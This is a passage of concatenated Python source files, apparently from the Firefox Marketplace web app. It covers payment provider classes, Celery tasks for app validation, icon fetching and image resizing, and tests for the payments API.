url = 'mkt.developers.apps.payments.bango_portal_from_addon'
return reverse(url, args=[app_slug]) if app_slug else ''
class Reference(Provider):
"""
The reference implementation provider. If another provider
implements to the reference specification, then it should be able to
just inherit from this with minor changes.
"""
client = pay_client.api.provider.reference
forms = {
'account': forms_payments.ReferenceAccountForm,
}
full = _('Reference Implementation')
name = 'reference'
provider = PROVIDER_REFERENCE
templates = {
'add': os.path.join(root, 'add_payment_account_reference.html'),
'edit': os.path.join(root, 'edit_payment_account_reference.html'),
}
def account_create(self, user, form_data):
user_seller = self.setup_seller(user)
form_data.update({'uuid': user_seller.uuid, 'status': 'ACTIVE'})
name = form_data.pop('account_name')
res = self.client.sellers.post(data=form_data)
return self.setup_account(user=user,
uri=res['resource_uri'],
solitude_seller=user_seller,
account_id=res['id'],
name=name)
@account_check
def account_retrieve(self, account):
data = {'account_name': account.name}
data.update(self.client.sellers(account.account_id).get())
return data
@account_check
def account_update(self, account, form_data):
account.update(name=form_data.pop('account_name'))
self.client.sellers(account.account_id).put(form_data)
@account_check
def product_create(self, account, app):
secret = generate_key(48)
generic = self.get_or_create_generic_product(app, secret=secret)
# These just pass straight through to zippy to create the product
# and don't create any intermediate objects in solitude.
#
# Until bug 948240 is fixed, we have to do this, again.
try:
created = self.client.products.get(
external_id=generic['external_id'],
seller_id=uri_to_pk(account.uri))
except HttpClientError:
created = []
if len(created) > 1:
raise ValueError('Zippy returned more than one resource.')
elif len(created) == 1:
return created[0]['resource_uri']
created = self.client.products.post(data={
'external_id': generic['external_id'],
'seller_id': uri_to_pk(account.uri),
'name': unicode(app.name),
'uuid': str(uuid.uuid4()),
})
return created['resource_uri']
@account_check
def terms_retrieve(self, account):
res = self.client.terms(account.account_id).get()
if 'text' in res:
res['text'] = bleach.clean(res['text'])
return res
@account_check
def terms_update(self, account):
account.update(agreed_tos=True)
# GETed data from Zippy needs to be reformated prior to be PUT
# until bug 966096 is fixed.
data = self.client.sellers(account.account_id).get()
for field in ['id', 'resource_uri', 'resource_name']:
del data[field]
data['agreement'] = datetime.now().strftime('%Y-%m-%d')
return self.client.sellers(account.account_id).put(data)
class Boku(Provider):
"""
Specific Boku implementation details.
"""
client = pay_client.api.boku
forms = {
'account': forms_payments.BokuAccountForm,
}
full = _('Boku')
name = 'boku'
provider = PROVIDER_BOKU
templates = {
'add': os.path.join(root, 'add_payment_account_boku.html'),
'edit': os.path.join(root, 'edit_payment_account_boku.html'),
}
signup_url = settings.BOKU_SIGNUP_URL
def account_create(self, user, form_data):
user_seller = self.setup_seller(user)
form_data.update({'seller': user_seller.resource_uri})
name = form_data.pop('account_name')
res = self.client.seller.post(data=form_data)
return self.setup_account(account_id=res['id'],
agreed_tos=True,
name=name,
solitude_seller=user_seller,
user=user,
uri=res['resource_uri'])
@account_check
def account_retrieve(self, account):
return {}
@account_check
def terms_retrieve(self, account):
return {'accepted': True}
@account_check
def terms_update(self, account):
account.update(agreed_tos=True)
return {'accepted': True}
@account_check
def product_create(self, account, app):
generic_product = self.get_or_create_generic_product(app)
existing_boku_products = self.client.product.get(
seller_product=generic_product['resource_pk'])
existing_count = existing_boku_products['meta']['total_count']
if existing_count == 0:
boku_product = self.client.product.post(data={
'seller_boku': account.uri,
'seller_product': generic_product['resource_uri']})
elif existing_count == 1:
existing_boku_product = existing_boku_products['objects'][0]
boku_product = self.client.by_url(
existing_boku_product['resource_uri'],
).patch(
data={
'seller_boku': account.uri,
'seller_product': generic_product['resource_uri']})
else:
raise ValueError((
'More than one existing Boku Product found when '
'creating a new Boku Product in Solitude: {products}'
).format(products=existing_boku_products['objects']))
return boku_product['resource_uri']
def get_portal_url(self, app_slug=None):
return settings.BOKU_PORTAL
ALL_PROVIDERS = {}
ALL_PROVIDERS_BY_ID = {}
for p in (Bango, Reference, Boku):
ALL_PROVIDERS[p.name] = p
ALL_PROVIDERS_BY_ID[p.provider] = p
def get_provider(name=None, id=None):
"""
Get a provider implementation instance by name or id.
"""
if id is not None:
provider = ALL_PROVIDERS_BY_ID[id]()
else:
if name is None:
# This returns the default provider so we can provide backwards
# capability for API's that expect get_provider to return 'bango'.
# TODO: This should raise an exception after we clean up Bango
# code.
name = settings.DEFAULT_PAYMENT_PROVIDER
provider = ALL_PROVIDERS[name]()
if provider.name not in settings.PAYMENT_PROVIDERS:
raise ImproperlyConfigured(
'The provider {p} is not one of the '
'allowed PAYMENT_PROVIDERS.'.format(p=provider.name))
return provider
def get_providers():
return [ALL_PROVIDERS[name]() for name in settings.PAYMENT_PROVIDERS]
########NEW FILE########
__FILENAME__ = serializers
from rest_framework.serializers import ModelSerializer, SerializerMethodField
from mkt.webapps.models import ContentRating
class ContentRatingSerializer(ModelSerializer):
body = SerializerMethodField('get_body')
rating = SerializerMethodField('get_rating')
def get_body(self, obj):
return obj.get_body().label
def get_rating(self, obj):
return obj.get_rating().label
class Meta:
model = ContentRating
fields = ('created', 'modified', 'body', 'rating')
########NEW FILE########
__FILENAME__ = signals
import django.dispatch
submission_done = django.dispatch.Signal()
########NEW FILE########
__FILENAME__ = tasks
# -*- coding: utf-8 -*-
import base64
import hashlib
import json
import logging
import os
import shutil
import subprocess
import sys
import traceback
import urlparse
import uuid
import zipfile
from datetime import date
from django import forms
from django.conf import settings
from django.core.files.storage import default_storage as storage
from django.utils.http import urlencode
import requests
from appvalidator import validate_app, validate_packaged_app
from celery_tasktree import task_with_callbacks
from celeryutils import task
from django_statsd.clients import statsd
from PIL import Image
from tower import ugettext as _
import amo
from addons.models import Addon
from amo.decorators import set_modified_on, write
from amo.helpers import absolutify
from amo.utils import remove_icons, resize_image, send_mail_jinja, strip_bom
from files.models import FileUpload, File, FileValidation
from files.utils import SafeUnzip
from mkt.constants import APP_PREVIEW_SIZES
from mkt.webapps.models import AddonExcludedRegion, Webapp
from mkt.webapps.utils import iarc_get_app_info
log = logging.getLogger('z.mkt.developers.task')
CT_URL = (
'https://developer.mozilla.org/docs/Web/Apps/Manifest#Serving_manifests'
)
@task
@write
def validator(upload_id, **kw):
if not settings.VALIDATE_ADDONS:
return None
log.info(u'[FileUpload:%s] Validating app.' % upload_id)
try:
upload = FileUpload.objects.get(pk=upload_id)
except FileUpload.DoesNotExist:
log.info(u'[FileUpload:%s] Does not exist.' % upload_id)
return
try:
validation_result = run_validator(upload.path, url=kw.get('url'))
if upload.validation:
# If there's any preliminary validation result, merge it with the
# actual validation result.
dec_prelim_result = json.loads(upload.validation)
if 'prelim' in dec_prelim_result:
dec_validation_result = json.loads(validation_result)
# Merge the messages.
dec_validation_result['messages'] += (
dec_prelim_result['messages'])
# Merge the success value.
if dec_validation_result['success']:
dec_validation_result['success'] = (
dec_prelim_result['success'])
# Merge the error count (we only raise errors, not warnings).
dec_validation_result['errors'] += dec_prelim_result['errors']
# Put the validation result back into JSON.
validation_result = json.dumps(dec_validation_result)
upload.validation = validation_result
upload.save() # We want to hit the custom save().
except Exception:
# Store the error with the FileUpload job, then raise
# it for normal logging.
tb = traceback.format_exception(*sys.exc_info())
upload.update(task_error=''.join(tb))
raise
@task
@write
def file_validator(file_id, **kw):
if not settings.VALIDATE_ADDONS:
return None
log.info(u'[File:%s] Validating file.' % file_id)
try:
file = File.objects.get(pk=file_id)
except File.DoesNotExist:
log.info(u'[File:%s] Does not exist.' % file_id)
return
# Unlike upload validation, let the validator raise an exception if there
# is one.
result = run_validator(file.file_path, url=file.version.addon.manifest_url)
return FileValidation.from_json(file, result)
def run_validator(file_path, url=None):
"""A pre-configured wrapper around the app validator."""
with statsd.timer('mkt.developers.validator'):
is_packaged = zipfile.is_zipfile(file_path)
if is_packaged:
log.info(u'Running `validate_packaged_app` for path: %s'
% (file_path))
with statsd.timer('mkt.developers.validate_packaged_app'):
return validate_packaged_app(file_path,
market_urls=settings.VALIDATOR_IAF_URLS,
timeout=settings.VALIDATOR_TIMEOUT,
spidermonkey=settings.SPIDERMONKEY)
else:
log.info(u'Running `validate_app` for path: %s' % (file_path))
with statsd.timer('mkt.developers.validate_app'):
return validate_app(storage.open(file_path).read(),
market_urls=settings.VALIDATOR_IAF_URLS,
url=url)
def _hash_file(fd):
return hashlib.md5(fd.read()).hexdigest()[:8]
@task
@set_modified_on
def resize_icon(src, dst, sizes, locally=False, **kw):
"""Resizes addon icons."""
log.info('[1@None] Resizing icon: %s' % dst)
try:
for s in sizes:
size_dst = '%s-%s.png' % (dst, s)
resize_image(src, size_dst, (s, s),
remove_src=False, locally=locally)
pngcrush_image.delay(size_dst, **kw)
if locally:
with open(src) as fd:
icon_hash = _hash_file(fd)
os.remove(src)
else:
with storage.open(src) as fd:
icon_hash = _hash_file(fd)
storage.delete(src)
log.info('Icon resizing completed for: %s' % dst)
return {'icon_hash': icon_hash}
except Exception, e:
log.error("Error saving addon icon: %s; %s" % (e, dst))
@task
@set_modified_on
def pngcrush_image(src, **kw):
"""Optimizes a PNG image by running it through Pngcrush."""
log.info('[1@None] Optimizing image: %s' % src)
try:
# pngcrush -ow has some issues, use a temporary file and do the final
# renaming ourselves.
suffix = '.opti.png'
tmp_path = '%s%s' % (os.path.splitext(src)[0], suffix)
cmd = [settings.PNGCRUSH_BIN, '-q', '-rem', 'alla', '-brute',
'-reduce', '-e', suffix, src]
sp = subprocess.Popen(cmd, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = sp.communicate()
if sp.returncode != 0:
log.error('Error optimizing image: %s; %s' % (src,
stderr.strip()))
pngcrush_image.retry(args=[src], kwargs=kw, max_retries=3)
return False
shutil.move(tmp_path, src)
log.info('Image optimization completed for: %s' % src)
return True
except Exception, e:
log.error('Error optimizing image: %s; %s' % (src, e))
@task
@set_modified_on
def resize_preview(src, instance, **kw):
"""Resizes preview images and stores the sizes on the preview."""
thumb_dst, full_dst = instance.thumbnail_path, instance.image_path
sizes = instance.sizes or {}
log.info('[1@None] Resizing preview and storing size: %s' % thumb_dst)
try:
thumbnail_size = APP_PREVIEW_SIZES[0][:2]
image_size = APP_PREVIEW_SIZES[1][:2]
with storage.open(src, 'rb') as fp:
size = Image.open(fp).size
if size[0] > size[1]:
# If the image is wider than tall, then reverse the wanted size
# to keep the original aspect ratio while still resizing to
# the correct dimensions.
thumbnail_size = thumbnail_size[::-1]
image_size = image_size[::-1]
if kw.get('generate_thumbnail', True):
sizes['thumbnail'] = resize_image(src, thumb_dst,
thumbnail_size,
remove_src=False)
if kw.get('generate_image', True):
sizes['image'] = resize_image(src, full_dst,
image_size,
remove_src=False)
instance.sizes = sizes
instance.save()
log.info('Preview resized to: %s' % thumb_dst)
return True
except Exception, e:
log.error("Error saving preview: %s; %s" % (e, thumb_dst))
@task
@write
def get_preview_sizes(ids, **kw):
log.info('[%s@%s] Getting preview sizes for addons starting at id: %s...'
% (len(ids), get_preview_sizes.rate_limit, ids[0]))
addons = Addon.objects.filter(pk__in=ids).no_transforms()
for addon in addons:
previews = addon.previews.all()
log.info('Found %s previews for: %s' % (previews.count(), addon.pk))
for preview in previews:
try:
log.info('Getting size for preview: %s' % preview.pk)
sizes = {
'thumbnail': Image.open(preview.thumbnail_path).size,
'image': Image.open(preview.image_path).size,
}
preview.update(sizes=sizes)
except Exception, err:
log.error('Failed to find size of preview: %s, error: %s'
% (addon.pk, err))
def _fetch_content(url):
with statsd.timer('developers.tasks.fetch_content'):
try:
res = requests.get(url, timeout=30, stream=True)
if not 200 <= res.status_code < 300:
statsd.incr('developers.tasks.fetch_content.error')
raise Exception('An invalid HTTP status code was returned.')
if not res.headers.keys():
statsd.incr('developers.tasks.fetch_content.error')
raise Exception('The HTTP server did not return headers.')
statsd.incr('developers.tasks.fetch_content.success')
return res
except requests.RequestException as e:
statsd.incr('developers.tasks.fetch_content.error')
log.error('fetch_content connection error: %s' % e)
raise Exception('The file could not be retrieved.')
class ResponseTooLargeException(Exception):
pass
def get_content_and_check_size(response, max_size):
# Read one extra byte. Reject if it's too big so we don't have issues
# downloading huge files.
content = response.iter_content(chunk_size=max_size + 1).next()
if len(content) > max_size:
raise ResponseTooLargeException('Too much data.')
return content
def save_icon(webapp, content):
tmp_dst = os.path.join(settings.TMP_PATH, 'icon', uuid.uuid4().hex)
with storage.open(tmp_dst, 'wb') as fd:
fd.write(content)
dirname = webapp.get_icon_dir()
destination = os.path.join(dirname, '%s' % webapp.id)
remove_icons(destination)
resize_icon(tmp_dst, destination, amo.ADDON_ICON_SIZES,
set_modified_on=[webapp])
# Need to set the icon type so .get_icon_url() works
# normally submit step 4 does it through AppFormMedia,
# but we want to beat them to the punch.
# resize_icon outputs pngs, so we know it's 'image/png'
webapp.icon_type = 'image/png'
webapp.save()
@task_with_callbacks
@write
def fetch_icon(webapp, **kw):
"""Downloads a webapp icon from the location specified in the manifest.
Returns False if icon was not able to be retrieved
"""
log.info(u'[1@None] Fetching icon for webapp %s.' % webapp.name)
manifest = webapp.get_manifest_json()
if not manifest or not 'icons' in manifest:
# Set the icon type to empty.
webapp.update(icon_type='')
return
try:
biggest = max(int(size) for size in manifest['icons'])
except ValueError:
log.error('No icon to fetch for webapp "%s"' % webapp.name)
return False
icon_url = manifest['icons'][str(biggest)]
if icon_url.startswith('data:image'):
image_string = icon_url.split('base64,')[1]
content = base64.decodestring(image_string)
else:
if webapp.is_packaged:
# Get icons from package.
if icon_url.startswith('/'):
icon_url = icon_url[1:]
try:
zf = SafeUnzip(webapp.get_latest_file().file_path)
zf.is_valid()
content = zf.extract_path(icon_url)
except (KeyError, forms.ValidationError): # Not found in archive.
log.error(u'[Webapp:%s] Icon %s not found in archive'
% (webapp, icon_url))
return False
else:
if not urlparse.urlparse(icon_url).scheme:
icon_url = webapp.origin + icon_url
try:
response = _fetch_content(icon_url)
except Exception, e:
log.error(u'[Webapp:%s] Failed to fetch icon for webapp: %s'
% (webapp, e))
# Set the icon type to empty.
webapp.update(icon_type='')
return False
try:
content = get_content_and_check_size(
response, settings.MAX_ICON_UPLOAD_SIZE)
except ResponseTooLargeException:
log.warning(u'[Webapp:%s] Icon exceeds maximum size.' % webapp)
return False
log.info('Icon fetching completed for app "%s"; saving icon' % webapp.name)
save_icon(webapp, content)
def failed_validation(*messages, **kwargs):
"""Return a validation object that looks like the add-on validator."""
upload = kwargs.pop('upload', None)
if upload is None or not upload.validation:
msgs = []
else:
msgs = json.loads(upload.validation)['messages']
for msg in messages:
msgs.append({'type': 'error', 'message': msg, 'tier': 1})
return json.dumps({'errors': sum(1 for m in msgs if m['type'] == 'error'),
'success': False,
'messages': msgs,
'prelim': True})
def _fetch_manifest(url, upload=None):
def fail(message, upload=None):
if upload is None:
# If `upload` is None, that means we're using one of @washort's old
# implementations that expects an exception back.
raise Exception(message)
upload.update(validation=failed_validation(message, upload=upload))
try:
response = _fetch_content(url)
except Exception, e:
log.error('Failed to fetch manifest from %r: %s' % (url, e))
fail(_('No manifest was found at that URL. Check the address and try '
'again.'), upload=upload)
return
ct = response.headers.get('content-type', '')
if not ct.startswith('application/x-web-app-manifest+json'):
fail(_('Manifests must be served with the HTTP header '
'"Content-Type: application/x-web-app-manifest+json". See %s '
'for more information.') % CT_URL,
upload=upload)
try:
max_webapp_size = settings.MAX_WEBAPP_UPLOAD_SIZE
content = get_content_and_check_size(response, max_webapp_size)
except ResponseTooLargeException:
fail(_('Your manifest must be less than %s bytes.') % max_webapp_size,
upload=upload)
return
try:
content.decode('utf_8')
except (UnicodeDecodeError, UnicodeEncodeError), exc:
log.info('Manifest decode error: %s: %s' % (url, exc))
fail(_('Your manifest file was not encoded as valid UTF-8.'),
upload=upload)
return
# Get the individual parts of the content type.
ct_split = map(str.strip, ct.split(';'))
if len(ct_split) > 1:
# Figure out if we've got a charset specified.
kv_pairs = dict(tuple(p.split('=', 1)) for p in ct_split[1:] if
'=' in p)
if 'charset' in kv_pairs and kv_pairs['charset'].lower() != 'utf-8':
fail(_("The manifest's encoding does not match the charset "
'provided in the HTTP Content-Type.'),
upload=upload)
content = strip_bom(content)
return content
@task
@write
def fetch_manifest(url, upload_pk=None, **kw):
log.info(u'[1@None] Fetching manifest: %s.' % url)
upload = FileUpload.objects.get(pk=upload_pk)
content = _fetch_manifest(url, upload)
if content is None:
return
upload.add_file([content], url, len(content), is_webapp=True)
# Send the upload to the validator.
validator(upload.pk, url=url)
@task
def subscribe_to_responsys(campaign, address, format='html', source_url='',
lang='', country='', **kw):
"""
Subscribe a user to a list in responsys. There should be two
fields within the Responsys system named by the "campaign"
parameter: <campaign>_FLG and <campaign>_DATE.
"""
data = {
'LANG_LOCALE': lang,
'COUNTRY_': country,
'SOURCE_URL': source_url,
'EMAIL_ADDRESS_': address,
'EMAIL_FORMAT_': 'H' if format == 'html' else 'T',
}
data['%s_FLG' % campaign] = 'Y'
data['%s_DATE' % campaign] = date.today().strftime('%Y-%m-%d')
data['_ri_'] = settings.RESPONSYS_ID
try:
res = requests.get('http://awesomeness.mozilla.org/pub/rf',
data=urlencode(data))
return res.status_code == 200
except requests.RequestException:
return False
@task
def region_email(ids, regions, **kw):
region_names = regions = sorted([unicode(r.name) for r in regions])
# Format the region names with commas and fanciness.
if len(regions) == 2:
suffix = 'two'
region_names = ' '.join([regions[0], _(u'and'), regions[1]])
else:
if len(regions) == 1:
suffix = 'one'
elif len(regions) > 2:
suffix = 'many'
region_names[-1] = _(u'and') + ' ' + region_names[-1]
region_names = ', '.join(region_names)
log.info('[%s@%s] Emailing devs about new region(s): %s.' %
(len(ids), region_email.rate_limit, region_names))
for id_ in ids:
log.info('[Webapp:%s] Emailing devs about new region(s): %s.' %
(id_, region_names))
product = Webapp.objects.get(id=id_)
to = set(product.authors.values_list('email', flat=True))
if len(regions) == 1:
subject = _(
u'{region} region added to the Firefox Marketplace').format(
region=regions[0])
else:
subject = _(u'New regions added to the Firefox Marketplace')
dev_url = absolutify(product.get_dev_url('edit'),
settings.SITE_URL) + '#details'
context = {'app': product.name,
'regions': region_names,
'dev_url': dev_url}
send_mail_jinja('%s: %s' % (product.name, subject),
'developers/emails/new_regions_%s.ltxt' % suffix,
context, recipient_list=to,
perm_setting='app_regions')
@task
@write
def region_exclude(ids, regions, **kw):
region_names = ', '.join(sorted([unicode(r.name) for r in regions]))
log.info('[%s@%s] Excluding new region(s): %s.' %
(len(ids), region_exclude.rate_limit, region_names))
for id_ in ids:
log.info('[Webapp:%s] Excluding region(s): %s.' %
(id_, region_names))
for region in regions:
# Already excluded? Swag!
AddonExcludedRegion.objects.get_or_create(addon_id=id_,
region=region.id)
@task
def save_test_plan(f, filename, addon):
dst_root = os.path.join(settings.ADDONS_PATH, str(addon.id))
dst = os.path.join(dst_root, filename)
with open(dst, 'wb+') as destination:
for chunk in f.chunks():
destination.write(chunk)
@task
@write
def refresh_iarc_ratings(ids, **kw):
"""
Refresh old or corrupt IARC ratings by re-fetching the certificate.
"""
for app in Webapp.objects.filter(id__in=ids):
data = iarc_get_app_info(app)
if data.get('rows'):
row = data['rows'][0]
# We found a rating, so store the id and code for future use.
app.set_descriptors(row.get('descriptors', []))
app.set_interactives(row.get('interactives', []))
app.set_content_ratings(row.get('ratings', {}))
########NEW FILE########
__FILENAME__ = test_api_payments
import json
from django.core.urlresolvers import reverse
from django import forms
from curling.lib import HttpClientError, HttpServerError
from mock import Mock, patch
from nose.tools import eq_, ok_
from rest_framework.request import Request
from test_utils import RequestFactory
import amo
from addons.models import AddonUpsell, AddonUser
from amo.tests import app_factory, TestCase
from mkt.api.tests.test_oauth import RestOAuth
from mkt.developers.api_payments import (AddonPaymentAccountSerializer,
PaymentAppViewSet)
from mkt.developers.models import (AddonPaymentAccount, PaymentAccount,
SolitudeSeller)
from mkt.developers.tests.test_providers import Patcher
from mkt.site.fixtures import fixture
from mkt.webapps.models import Webapp
from mkt.prices.models import AddonPremium, Price
package_data = {
'companyName': 'company',
'vendorName': 'vendor',
'financeEmailAddress': '[email protected]',
'adminEmailAddress': '[email protected]',
'supportEmailAddress': '[email protected]',
'address1': 'address 1',
'addressCity': 'city',
'addressState': 'state',
'addressZipCode': 'zip',
'addressPhone': '123',
'countryIso': 'BRA',
'currencyIso': 'EUR',
'account_name': 'new',
'provider': 'bango',
}
bank_data = {
'bankAccountPayeeName': 'name',
'bankAccountNumber': '123',
'bankAccountCode': '123',
'bankName': 'asd',
'bankAddress1': 'address 2',
'bankAddressZipCode': '123',
'bankAddressIso': 'BRA',
}
payment_data = package_data.copy()
payment_data.update(bank_data)
class UpsellCase(TestCase):
def url(self, app):
return reverse('app-detail', kwargs={'pk': app.pk})
def setUp(self):
self.free = Webapp.objects.get(pk=337141)
self.free_url = self.url(self.free)
self.premium = app_factory(premium_type=amo.ADDON_PREMIUM)
self.premium_url = self.url(self.premium)
self.upsell_list = reverse('app-upsell-list')
def create_upsell(self):
self.upsell = AddonUpsell.objects.create(free=self.free,
premium=self.premium)
self.upsell_url = reverse('app-upsell-detail',
kwargs={'pk': self.upsell.pk})
def create_allowed(self):
AddonUser.objects.create(addon=self.free, user=self.profile)
AddonUser.objects.create(addon=self.premium, user=self.profile)
class TestUpsell(RestOAuth, UpsellCase):
fixtures = fixture('webapp_337141', 'user_2519')
def setUp(self):
super(TestUpsell, self).setUp()
UpsellCase.setUp(self)
self.create_switch('allow-b2g-paid-submission')
def test_create(self):
eq_(self.client.post(self.upsell_list, data={}).status_code, 400)
def test_missing(self):
res = self.client.post(self.upsell_list,
data=json.dumps({'free': self.free_url}))
eq_(res.status_code, 400)
eq_(res.json['premium'], [u'This field is required.'])
def test_not_allowed(self):
res = self.client.post(self.upsell_list, data=json.dumps(
{'free': self.free_url, 'premium': self.premium_url}))
eq_(res.status_code, 403)
def test_allowed(self):
self.create_allowed()
res = self.client.post(self.upsell_list, data=json.dumps(
{'free': self.free_url, 'premium': self.premium_url}))
eq_(res.status_code, 201)
def test_delete_not_allowed(self):
self.create_upsell()
eq_(self.client.delete(self.upsell_url).status_code, 403)
def test_delete_allowed(self):
self.create_upsell()
self.create_allowed()
eq_(self.client.delete(self.upsell_url).status_code, 204)
def test_wrong_way_around(self):
res = self.client.post(self.upsell_list, data=json.dumps(
{'free': self.premium_url, 'premium': self.free_url}))
eq_(res.status_code, 400)
def test_patch_new_not_allowed(self):
# Trying to patch to a new object you do not have access to.
self.create_upsell()
self.create_allowed()
another = app_factory(premium_type=amo.ADDON_PREMIUM)
res = self.client.patch(self.upsell_url, data=json.dumps(
{'free': self.free_url, 'premium': self.url(another)}))
eq_(res.status_code, 403)
def test_patch_old_not_allowed(self):
# Trying to patch an old object you do not have access to.
self.create_upsell()
AddonUser.objects.create(addon=self.free, user=self.profile)
# We did not give you access to patch away from self.premium.
another = app_factory(premium_type=amo.ADDON_PREMIUM)
AddonUser.objects.create(addon=another, user=self.profile)
res = self.client.patch(self.upsell_url, data=json.dumps(
{'free': self.free_url, 'premium': self.url(another)}))
eq_(res.status_code, 403)
def test_patch(self):
self.create_upsell()
self.create_allowed()
another = app_factory(premium_type=amo.ADDON_PREMIUM)
AddonUser.objects.create(addon=another, user=self.profile)
res = self.client.patch(self.upsell_url, data=json.dumps(
{'free': self.free_url, 'premium': self.url(another)}))
eq_(res.status_code, 200)
class AccountCase(Patcher, TestCase):
def setUp(self):
self.app = Webapp.objects.get(pk=337141)
self.app.update(premium_type=amo.ADDON_PREMIUM)
self.seller = SolitudeSeller.objects.create(user_id=2519)
self.account = PaymentAccount.objects.create(user_id=2519,
solitude_seller=self.seller, account_id=123, name='mine')
self.app_payment_list = reverse('app-payment-account-list')
self.payment_list = reverse('payment-account-list')
self.payment_url = reverse('payment-account-detail',
kwargs={'pk': self.account.pk})
super(AccountCase, self).setUp()
self.patched_client.api.generic.product.get_object.return_value = {
'resource_uri': 'foo'}
self.patched_client.api.bango.product.get_object.return_value = {
'resource_uri': 'foo', 'bango_id': 'bar'}
def create(self):
self.payment = AddonPaymentAccount.objects.create(addon=self.app,
payment_account=self.account)
self.app_payment_detail = reverse('app-payment-account-detail',
kwargs={'pk': self.payment.pk})
def create_price(self):
price = Price.objects.create(price='1')
AddonPremium.objects.create(addon=self.app, price=price)
def create_user(self):
AddonUser.objects.create(addon=self.app, user=self.profile)
def other(self, shared=False):
self.seller2 = SolitudeSeller.objects.create(user_id=31337, uuid='foo')
self.other_account = PaymentAccount.objects.create(user_id=31337,
solitude_seller=self.seller2, account_id=123,
seller_uri='seller_uri', uri='uri', shared=shared, name='other')
self.other_url = reverse('payment-account-detail',
kwargs={'pk': self.other_account.pk})
return self.data(overrides={'payment_account': self.other_url})
def data(self, overrides=None):
res = {
'addon': self.app.get_api_url(pk=True),
'payment_account': self.payment_url,
'provider': 'bango',
}
if overrides:
res.update(overrides)
return res
class TestSerializer(AccountCase):
fixtures = fixture('webapp_337141', 'user_999', 'user_2519')
def test_serialize(self):
# Just a smoke test that we can serialize this correctly.
self.create()
request = Request(RequestFactory().get('/'))
res = AddonPaymentAccountSerializer(self.payment,
context={'request': request}).data
eq_(res['url'], self.app_payment_detail)
def test_free(self):
# Just a smoke test that we can serialize this correctly.
self.create()
self.app.update(premium_type=amo.ADDON_FREE)
res = AddonPaymentAccountSerializer(self.payment)
ok_(not res.is_valid())
class TestPaymentAccount(AccountCase, RestOAuth):
fixtures = fixture('webapp_337141', 'user_999', 'user_2519')
def test_anonymous(self):
r = self.anon.get(self.payment_url)
eq_(r.status_code, 403)
r = self.anon.get(self.payment_list)
eq_(r.status_code, 403)
def test_get_payments_account_list(self):
self.other()
res = self.client.get(self.payment_list)
data = json.loads(res.content)
eq_(data['meta']['total_count'], 1)
eq_(data['objects'][0]['account_name'], 'mine')
eq_(data['objects'][0]['resource_uri'], self.payment_url)
def test_get_payments_account(self):
res = self.client.get(self.payment_url)
eq_(res.status_code, 200, res.content)
data = json.loads(res.content)
eq_(data['account_name'], 'mine')
eq_(data['resource_uri'], self.payment_url)
def test_get_other_payments_account(self):
self.other()
res = self.client.get(self.other_url)
eq_(res.status_code, 404, res.content)
def test_create(self):
res = self.client.post(self.payment_list,
data=json.dumps(payment_data))
data = json.loads(res.content)
eq_(data['account_name'], 'new')
new_account = PaymentAccount.objects.get(name='new')
ok_(new_account.pk != self.account.pk)
eq_(new_account.user, self.user)
data = self.bango_patcher.package.post.call_args[1]['data']
expected = package_data.copy()
expected.pop('account_name')
expected.pop('provider')
for key in expected.keys():
eq_(package_data[key], data[key])
def test_update_payments_account(self):
res = self.client.put(self.payment_url,
data=json.dumps(payment_data))
eq_(res.status_code, 204, res.content)
self.account.reload()
eq_(self.account.name, 'new')
data = self.bango_patcher.api.by_url().patch.call_args[1]['data']
expected = package_data.copy()
expected.pop('account_name')
expected.pop('provider')
for key in expected.keys():
eq_(package_data[key], data[key])
def test_update_other_payments_account(self):
self.other()
res = self.client.put(self.other_url,
data=json.dumps(payment_data))
eq_(res.status_code, 404, res.content)
self.other_account.reload()
eq_(self.other_account.name, 'other') # not "new".
def test_delete_payments_account(self):
self.create_user()
self.create()
eq_(self.account.inactive, False)
res = self.client.delete(self.payment_url)
eq_(res.status_code, 204, res.content)
self.account.reload()
eq_(self.account.inactive, True)
def test_delete_shared(self):
self.create_user()
self.create()
self.account.update(shared=True)
eq_(self.account.inactive, False)
res = self.client.delete(self.payment_url)
eq_(res.status_code, 409)
def test_delete_others_payments_account(self):
self.create_user()
self.create()
self.other()
eq_(self.other_account.inactive, False)
res = self.client.delete(self.other_url)
eq_(res.status_code, 404, res.content)
self.other_account.reload()
eq_(self.other_account.inactive, False)
def test_create_fail(self):
err = {'broken': True}
self.bango_patcher.package.post.side_effect = HttpClientError(
content=err)
res = self.client.post(self.payment_list,
data=json.dumps(payment_data))
eq_(res.status_code, 500)
eq_(json.loads(res.content), err)
def test_create_fail2(self):
self.bango_patcher.package.post.side_effect = HttpServerError()
res = self.client.post(self.payment_list,
data=json.dumps(payment_data))
eq_(res.status_code, 500)
class TestAddonPaymentAccount(AccountCase, RestOAuth):
fixtures = fixture('webapp_337141', 'user_999', 'user_2519')
def test_empty(self):
eq_(self.client.post(self.app_payment_list, data={}).status_code, 400)
def test_not_allowed(self):
res = self.client.post(self.app_payment_list,
data=json.dumps(self.data()))
eq_(res.status_code, 403)
def test_allowed(self):
self.bango_patcher.product.get_object_or_404.return_value = {
'resource_uri': '/f/b'}
self.create_price()
self.create_user()
res = self.client.post(self.app_payment_list,
data=json.dumps(self.data()))
eq_(res.status_code, 201, res.content)
account = AddonPaymentAccount.objects.get()
eq_(account.payment_account, self.account)
def test_cant_change_addon(self):
app = app_factory(premium_type=amo.ADDON_PREMIUM)
AddonUser.objects.create(addon=app, user=self.profile)
self.create()
self.create_price()
self.create_user()
data = self.data({'payment_account': self.payment_url,
'addon': app.get_api_url(pk=True)})
res = self.client.patch(self.app_payment_detail, data=json.dumps(data))
# Ideally we should make this a 400.
eq_(res.status_code, 403, res.content)
def test_cant_use_someone_elses(self):
data = self.other(shared=False)
self.create_price()
self.create_user()
res = self.client.post(self.app_payment_list, data=json.dumps(data))
eq_(res.status_code, 403, res.content)
def test_can_shared(self):
self.bango_patcher.product.get_object_or_404.return_value = {
'resource_uri': '/f/b'}
data = self.other(shared=True)
self.create_price()
self.create_user()
res = self.client.post(self.app_payment_list, data=json.dumps(data))
eq_(res.status_code, 201, res.content)
class TestPaymentStatus(AccountCase, RestOAuth):
fixtures = fixture('webapp_337141', 'user_999', 'user_2519')
def setUp(self):
super(TestPaymentStatus, self).setUp()
self.create()
self.payment.account_uri = '/bango/package/1/'
self.payment.save()
self.list_url = reverse('app-payments-status-list',
kwargs={'pk': 337141})
def test_no_auth(self):
eq_(self.anon.post(self.list_url, data={}).status_code, 403)
def test_not_owner(self):
eq_(self.client.post(self.list_url, data={}).status_code, 403)
def test_no_account(self):
self.payment.delete()
